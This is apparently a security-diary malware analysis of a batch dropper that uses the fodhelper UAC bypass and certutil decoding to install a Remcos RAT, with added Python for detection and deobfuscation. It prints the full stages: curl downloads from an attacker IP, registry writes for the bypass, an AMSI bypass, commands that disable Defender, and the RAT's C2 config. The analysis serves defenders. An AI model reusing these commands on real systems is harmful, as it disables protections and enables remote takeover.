My next class:
Reverse-Engineering Malware: Advanced Code Analysis | Online | Greenwich Mean Time | Oct 28th - Nov 1st 2024

RAT Delivered Through FODHelper

Published: 2022-09-22. Last Updated: 2022-09-22 07:11:21 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

I found a simple batch file that drops a Remcos[1] RAT through an old UAC bypass technique based on the "fodhelper" utility ("Features On Demand Helper", fodhelper.exe). The binary is auto-elevated: once launched, it looks for a specific registry key under the current user's hive (HKCU\Software\Classes\ms-settings, as the script below shows) and, if present, executes its content with high privileges.

The script, called "2.bat", is very simple. Note that, when opened in a text editor, it displays Chinese characters because of the BOM (Byte Order Mark): the file starts with a UTF-16 BOM (FF FE) but the rest is plain ASCII, so an editor that honours the BOM decodes each pair of ASCII bytes as one CJK code point. cmd.exe itself ignores the BOM: the two stray bytes are taken as an unknown command, and the "&cls" that follows clears the resulting error from the screen:

remnux@remnux:/MalwareZoo/20220919$ xxd 2.bat 
00000000: fffe 2663 6c73 0d0a 4065 6368 6f20 6f66  ..&cls..@echo of
00000010: 6620 0d0a 5469 746c 6520 257e 6e30 0d0a  f ..Title %~n0..
00000020: 4d6f 6465 2036 302c 3320 0d0a 636f 6c6f  Mode 60,3 ..colo
00000030: 7220 3042 0d0a 6563 686f 280d 0a65 6368  r 0B..echo(..ech
00000040: 6f20 2020 2020 2020 2020 506c 6561 7365  o         Please
00000050: 2077 6169 742e 2e2e 2061 2077 6869 6c65   wait... a while
00000060: 204c 6f61 6469 6e67 2064 6174 6120 2e2e   Loading data ..
00000070: 2e2e 0d0a 4345 5254 5554 494c 202d 6620  ....CERTUTIL -f 

Here is the decoded script:

cls
@echo off 
Title %~n0
Mode 60,3 
color 0B
echo(
echo         Please wait... a while Loading data ....
CERTUTIL -f -decode "%~f0" "%Temp%\2.bat" >nul 2>&1 
cls
"%Temp%\2.bat"
Exit
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----

certutil.exe (a common LOLBin) is used to decode the Base64 data embedded in the file, write it out as a new batch file and launch it. This works thanks to "%~f0", which expands to the full path of the running batch file itself: certutil -decode skips everything outside the BEGIN/END CERTIFICATE markers, so the dropper is at once a valid script and its own encoded container. Here is the decoded bat file:

@echo off
echo Please wait 30 seconds: we're bypassing the AuthID(HWID). This tray will autoclose once finished.
curl.exe -s --output %USERPROFILE%\Links\puedo.ps1 --url hxxp://171[.]22[.]30[.]120/puedo.ps1
timeout 5 > nul
curl.exe -s --output %USERPROFILE%\Links\adhd.bat --url hxxp://171[.]22[.]30[.]120/adhd.bat
timeout 5 > nul
curl.exe -s --output %USERPROFILE%\Links\net.vbs --url hxxp://171[.]22[.]30[.]120/net.vbs
timeout 5 > nul
powershell New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value %USERPROFILE%\Links\adhd.bat -Force
powershell New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
fodhelper
exit
Del %~0 
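The registry writes and the fodhelper launch above leave a recognisable trail in endpoint telemetry. The following Python is an added example, not code from the diary: it runs a handful of constructed, simplified Sysmon-style records (registry key create/value set events 12 and 13, process create event 1, using Sysmon's field names; the SID, paths and command lines are made up) through the indicators this dropper exhibits and escalates when the registry staging and the fodhelper child process appear together.

```python
"""Spot the fodhelper UAC-bypass chain in Sysmon-style endpoint telemetry.

Added example, not code from the diary. SAMPLE_EVENTS are constructed,
simplified Sysmon records (EventID 12 = registry key created, 13 = registry
value set, 1 = process created) using Sysmon's field names; the SID, paths
and command lines are made up. The indicators are the ones 2.bat exhibits:
a write to HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command, an
empty DelegateExecute value, and fodhelper.exe launched from (and launching)
a command shell.
"""
import re

MS_SETTINGS_CMD = re.compile(
    r"\\software\\classes\\ms-settings\\shell\\open\\command(\\|$)", re.IGNORECASE)
# Interpreters that fodhelper.exe has no business parenting or being parented by.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe"}

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
KEY = ("HKU\\S-1-5-21-0000000000-1111111111-2222222222-1001"
       "\\Software\\Classes\\ms-settings\\shell\\open\\command")

SAMPLE_EVENTS = [  # constructed; mirrors the order of operations in 2.bat
    {"EventID": 12, "EventType": "CreateKey", "Image": PS, "TargetObject": KEY},
    {"EventID": 13, "EventType": "SetValue", "Image": PS,
     "TargetObject": KEY + "\\(Default)", "Details": "C:\\Users\\victim\\Links\\adhd.bat"},
    {"EventID": 13, "EventType": "SetValue", "Image": PS,
     "TargetObject": KEY + "\\DelegateExecute", "Details": ""},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\fodhelper.exe", "IntegrityLevel": "High",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "fodhelper"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "IntegrityLevel": "High",
     "ParentImage": "C:\\Windows\\System32\\fodhelper.exe",
     "CommandLine": 'C:\\Windows\\system32\\cmd.exe /c ""C:\\Users\\victim\\Links\\adhd.bat" "'},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "IntegrityLevel": "Medium",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad"},  # benign noise
]


def _basename(path: str) -> str:
    """Last path component, lower-cased (works for registry paths too)."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_fodhelper_bypass(events):
    """Return one finding dict per suspicious event."""
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        image = ev.get("Image", "")
        if eid in (12, 13) and MS_SETTINGS_CMD.search(ev.get("TargetObject", "")):
            target = ev["TargetObject"]
            if _basename(target) == "delegateexecute":
                rule = "ms-settings DelegateExecute value written"
            elif eid == 13:
                rule = "ms-settings shell\\open\\command default value written"
            else:
                rule = "ms-settings shell\\open\\command key created"
            findings.append({"rule": rule, "image": image, "target": target,
                             "details": ev.get("Details", "")})
        elif eid == 1:
            parent, child = _basename(ev.get("ParentImage", "")), _basename(image)
            if parent == "fodhelper.exe" and child in SHELLS:
                findings.append({"rule": "fodhelper.exe spawned a shell/script host",
                                 "image": image, "target": ev.get("CommandLine", "")})
            elif child == "fodhelper.exe" and parent in SHELLS:
                findings.append({"rule": "fodhelper.exe launched from a shell",
                                 "image": image, "target": ev.get("CommandLine", "")})
    return findings


def verdict(findings) -> str:
    """Escalate when registry staging and the elevated child both appear."""
    rules = {f["rule"] for f in findings}
    staged = any(r.startswith("ms-settings") for r in rules)
    fired = "fodhelper.exe spawned a shell/script host" in rules
    if staged and fired:
        return "high"
    if staged or fired:
        return "medium"
    return "none"


if __name__ == "__main__":
    hits = detect_fodhelper_bypass(SAMPLE_EVENTS)
    for h in hits:
        print(f"[{h['rule']}] {h['image']} -> {h['target']}")
    print("verdict:", verdict(hits))
```

The key path is matched without its hive prefix because Sysmon renders HKCU as HKU\<SID>; the two process rules are kept separate so that a site that legitimately scripts fodhelper can drop the weaker "launched from a shell" one and keep the child-process rule, which is the part of the chain that actually runs with high integrity.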

Once fodhelper is launched, it executes adhd.bat (the command registered under the ms-settings key), which uses the same certutil trick:

cls
@echo off
Title %~n0
Mode 60,3
color 0B
echo(
echo         Please wait... a while Loading data ....
CERTUTIL -f -decode "%~f0" "%Temp%\adhd - Copia.bat" >nul 2>&1
cls
"%Temp%\adhd - Copia.bat"
Exit
-----BEGIN CERTIFICATE-----
QGVjaG8gb2ZmDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu
cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCmNkICVVU0VSUFJPRklMRSVcTGlu
a3NcDQpQb3dlclNoZWxsIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1GaWxlICJw
dWVkby5wczEiDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu
cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCnRpbWVvdXQgMTAgPiBudWwNCnN0
YXJ0IG5ldC52YnMNCmV4aXQNCg0KDQpEZWwgJX4wIA0KDQpEZWwgJX4wIA0K
-----END CERTIFICATE-----

The decoded Base64 contains:

@echo off
echo Almost finished: it will autoruns in less than 15 seconds!
cd %USERPROFILE%\Links\
PowerShell -ExecutionPolicy Bypass -File "puedo.ps1"
echo Almost finished: it will autoruns in less than 15 seconds!
timeout 10 > nul
start net.vbs
exit
Del %~0 
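Both 2.bat and adhd.bat rely on certutil -decode reading the script itself and ignoring everything outside the BEGIN/END CERTIFICATE markers. The Python below is an added example, not the diary's own tooling: it reproduces that extraction offline so the next stage can be read without executing anything, pulls out where the decoded stage would be written, and flags the misleading UTF-16 BOM. SAMPLE_DROPPER is constructed here: the batch header mirrors adhd.bat and the Base64 body is the one quoted in the diary above.

```python
"""Recover a certutil-embedded second stage from a batch dropper without running it.

Added example, not the diary's own tooling. certutil -decode ignores every line
outside the -----BEGIN/END CERTIFICATE----- markers, which is what lets one file
be a valid .bat and its own encoded container. This mimics that step, lists where
the decoded stage is written, and flags the UTF-16 BOM trick seen in 2.bat.
SAMPLE_DROPPER is constructed: the batch header mirrors adhd.bat and the Base64
body is the one quoted in the diary.
"""
import base64
import re

BEGIN = b"-----BEGIN CERTIFICATE-----"
END = b"-----END CERTIFICATE-----"
UTF16_BOMS = (b"\xff\xfe", b"\xfe\xff")
CERTUTIL_RE = re.compile(
    rb'certutil(?:\.exe)?\s+(?:-\w+\s+)*-decode\s+"([^"]+)"\s+"([^"]+)"', re.IGNORECASE)
PEM_BLOCK_RE = re.compile(re.escape(BEGIN) + rb"(.*?)" + re.escape(END), re.DOTALL)

# Base64 body of adhd.bat as quoted in the diary.
DIARY_BASE64 = b"""QGVjaG8gb2ZmDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu
cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCmNkICVVU0VSUFJPRklMRSVcTGlu
a3NcDQpQb3dlclNoZWxsIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1GaWxlICJw
dWVkby5wczEiDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu
cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCnRpbWVvdXQgMTAgPiBudWwNCnN0
YXJ0IG5ldC52YnMNCmV4aXQNCg0KDQpEZWwgJX4wIA0KDQpEZWwgJX4wIA0K"""

# Constructed dropper: UTF-16 BOM, a batch header like adhd.bat, then the PEM block.
SAMPLE_DROPPER = b"\r\n".join([
    b"\xff\xfe&cls",
    b"@echo off",
    b"Title %~n0",
    b"Mode 60,3",
    b"color 0B",
    b"echo(",
    b"echo         Please wait... a while Loading data ....",
    b'CERTUTIL -f -decode "%~f0" "%Temp%\\adhd - Copia.bat" >nul 2>&1',
    b"cls",
    b'"%Temp%\\adhd - Copia.bat"',
    b"Exit",
    BEGIN,
    DIARY_BASE64.replace(b"\n", b"\r\n"),
    END,
    b"",
])


def has_misleading_bom(data: bytes) -> bool:
    """True when the file opens with a UTF-16 BOM but the body is 8-bit text.

    Genuine UTF-16 text carries a NUL in every ASCII character; these droppers
    have none, so editors show CJK glyphs while cmd.exe runs the file as ANSI.
    """
    return data.startswith(UTF16_BOMS) and b"\x00" not in data[2:]


def certutil_targets(data: bytes) -> list[tuple[str, str]]:
    """(source, destination) pairs from every 'certutil ... -decode' line."""
    return [(s.decode("latin-1"), d.decode("latin-1")) for s, d in CERTUTIL_RE.findall(data)]


def extract_certutil_payloads(data: bytes) -> list[bytes]:
    """Decode every BEGIN/END CERTIFICATE block the way certutil -decode would."""
    payloads = []
    for block in PEM_BLOCK_RE.findall(data):
        b64 = b"".join(block.split())  # drop CR/LF and any indentation
        payloads.append(base64.b64decode(b64))
    return payloads


def batch_lines(payload: bytes) -> list[str]:
    """Non-empty command lines of a decoded stage, for quick reading."""
    return [ln for ln in payload.decode("latin-1").splitlines() if ln.strip()]


if __name__ == "__main__":
    print("misleading BOM:", has_misleading_bom(SAMPLE_DROPPER))
    print("certutil writes to:", certutil_targets(SAMPLE_DROPPER))
    for stage in extract_certutil_payloads(SAMPLE_DROPPER):
        print("--- decoded stage ---")
        print("\n".join(batch_lines(stage)))
```

Running it against a real sample is a matter of replacing SAMPLE_DROPPER with the file's bytes; because the extraction works on the PEM markers rather than on the batch syntax, it also handles droppers whose visible script has been padded or obfuscated, as long as certutil would still decode them.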

The PowerShell script "puedo.ps1" is responsible for downloading and executing the malware:

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Set-MpPreference -DisableRealtimeMonitoring $trUE
Set-MpPreference -DisableIOAVProtection $trUE
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\"
curl.exe -s --output ("photoscreen\$env:USERNAME\Links\Zu@E.jpeg".Replace('photo','C:\').Replace('screen','Users\').Replace('Zu@E','\zoey').Replace('jpeg','exe')) --url ("colibri://google/Papero.exe".Replace('colibri','http').Replace('google','171[.]22[.]30[.]120'))
cd C:\Users\$env:USERNAME\Links
.\zoey.exe
exit

Note that the script first tries to disable AMSI and Microsoft Defender: once the format strings of the obfuscated first line are unfolded, it sets the private static field amsiInitFailed of System.Management.Automation.AmsiUtils to $true through reflection, and the Set-MpPreference/Add-MpPreference calls turn off real-time monitoring and IOAV protection and exclude C:\ from scanning. The downloaded binary is a Remcos RAT (SHA256: 6e83574ed73d798183a1555a910dcc118ac05cf1eac77306ab6edfdcab9207c3) with the following config:

{
    "c2": [
        "171[.]22[.]30[.]7:5578"
    ],
    "attr": {
        "mutex": "asf4fas8sf48asf84as4f89huhhu99h9h-V446WS",
        "copy_file": "Isass.exe",
        "hide_file": false,
        "copy_folder": "Microsoft Updater",
        "delete_file": false,
        "keylog_file": "logs.dat",
        "keylog_flag": false,
        "audio_folder": "MicRecords",
        "install_flag": true,
        "install_path": "%ProgramFiles%",
        "keylog_crypt": false,
        "mouse_option": false,
        "connect_delay": "0",
        "keylog_folder": "remcos",
        "startup_value": "Windows Host Controller",
        "screenshot_flag": false,
        "screenshot_path": "%AppData%",
        "screenshot_time": "10",
        "connect_interval": "1",
        "hide_keylog_file": false,
        "screenshot_crypt": false,
        "audio_record_time": "5",
        "screenshot_folder": "Screenshots",
        "take_screenshot_time": "5",
        "take_screenshot_option": false
    },
    "rule": "Remcos",
    "botnet": "Papero",
    "family": "remcos"
}
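The first line of puedo.ps1 and its curl line hide every identifier behind string concatenation, PowerShell format templates ("{6}{3}..." -f 'a','b',...) and .Replace() chains, with backticks sprinkled inside member names. All three can be evaluated statically, which is how an analyst confirms what the line targets without executing it. The Python below is an added example, not from the diary: SAMPLE_SCRIPT is the puedo.ps1 text quoted above, while the regexes and indicator labels are this example's own.

```python
"""Statically unfold the string obfuscation used in puedo.ps1.

Added example, not the diary's own tooling. puedo.ps1 hides its identifiers
three ways: ('V'+'aR'+...) concatenation, ("{6}{3}..." -f 'a','b') format
templates and "text".Replace('a','b') chains, plus backticks inside member
names. Each is evaluated with plain regexes so the script can be read without
running PowerShell. SAMPLE_SCRIPT is the text quoted in the diary; regexes and
indicator labels are this example's own.
"""
import re

SAMPLE_SCRIPT = r"""sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Set-MpPreference -DisableRealtimeMonitoring $trUE
Set-MpPreference -DisableIOAVProtection $trUE
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\"
curl.exe -s --output ("photoscreen\$env:USERNAME\Links\Zu@E.jpeg".Replace('photo','C:\').Replace('screen','Users\').Replace('Zu@E','\zoey').Replace('jpeg','exe')) --url ("colibri://google/Papero.exe".Replace('colibri','http').Replace('google','171[.]22[.]30[.]120'))
cd C:\Users\$env:USERNAME\Links
.\zoey.exe
exit
"""

_STR = r"""(?:'[^']*'|"[^"]*")"""                      # one quoted literal
_STR_CAPTURE = r'"([^"]*)"|' + r"'([^']*)'"             # same, capturing the text
# ( 'V'+'aR' + 'IA' )  or  ( "1Q2U" +"zX" )
CONCAT_RE = re.compile(r"\(\s*" + _STR + r"(?:\s*\+\s*" + _STR + r")+\s*\)")
# ( "{1}{0}" -f 'F','rE' )
FORMAT_RE = re.compile(r"""\(\s*"([^"]*)"\s*-[fF]\s*((?:'[^']*'\s*,?\s*)+)\)""")
# ( "text".Replace('a','b').Replace('c','d') )
REPLACE_RE = re.compile(r"""\(\s*"([^"]*)"((?:\.Replace\('[^']*','[^']*'\))+)\s*\)""")
# A backtick before anything but a Windows PowerShell 5.1 escape letter
# (0 a b f n r t v) is a no-op, so "A`ss`Embly" is just "AssEmbly".
BACKTICK_RE = re.compile(r"`(?![0abfnrtv])(.)")
BRACED_VAR_RE = re.compile(r"\$\{(\w+)\}")               # ${nULl} -> $nULl


def _eval_concat(m):
    parts = re.findall(_STR_CAPTURE, m.group(0))
    return "'" + "".join(dq or sq for dq, sq in parts) + "'"


def _eval_format(m):
    template, args = m.group(1), re.findall(r"'([^']*)'", m.group(2))

    def pick(g):  # leave an index alone if the argument list is too short
        i = int(g.group(1))
        return args[i] if i < len(args) else g.group(0)

    return "'" + re.sub(r"\{(\d+)\}", pick, template) + "'"


def _eval_replace(m):
    text = m.group(1)  # .NET String.Replace is ordinal, like Python's
    for old, new in re.findall(r"\.Replace\('([^']*)','([^']*)'\)", m.group(2)):
        text = text.replace(old, new)
    return "'" + text + "'"


def deobfuscate(script: str) -> str:
    """Apply the three evaluators until stable, then clean backticks and ${}."""
    prev, out = None, script
    while out != prev:
        prev = out
        out = CONCAT_RE.sub(_eval_concat, out)
        out = FORMAT_RE.sub(_eval_format, out)
        out = REPLACE_RE.sub(_eval_replace, out)
    out = BACKTICK_RE.sub(r"\1", out)
    return BRACED_VAR_RE.sub(r"$\1", out)


INDICATORS = [
    (re.compile(r"AmsiUtils.*?amsiInitFailed", re.I | re.S),
     "AMSI bypass: amsiInitFailed forced to true via reflection"),
    (re.compile(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$tr", re.I),
     "Defender real-time monitoring disabled"),
    (re.compile(r"Set-MpPreference\s+-DisableIOAVProtection", re.I),
     "Defender IOAV (download scan) protection disabled"),
    (re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I),
     "Defender path exclusion added"),
]


def classify(deobfuscated: str) -> list[str]:
    """Labels for the defence-evasion steps visible once the strings are plain."""
    return [label for rx, label in INDICATORS if rx.search(deobfuscated)]


if __name__ == "__main__":
    plain = deobfuscate(SAMPLE_SCRIPT)
    print(plain)
    for label in classify(plain):
        print("*", label)
```

The substitutions run to a fixed point so that nested constructs (a format expression whose result feeds a concatenation, for instance) resolve in one call. Backticks are only removed where Windows PowerShell 5.1 treats them as no-ops; PowerShell 7 additionally interprets `e and `u, which is why this style of obfuscation sometimes breaks there.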

[1] https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
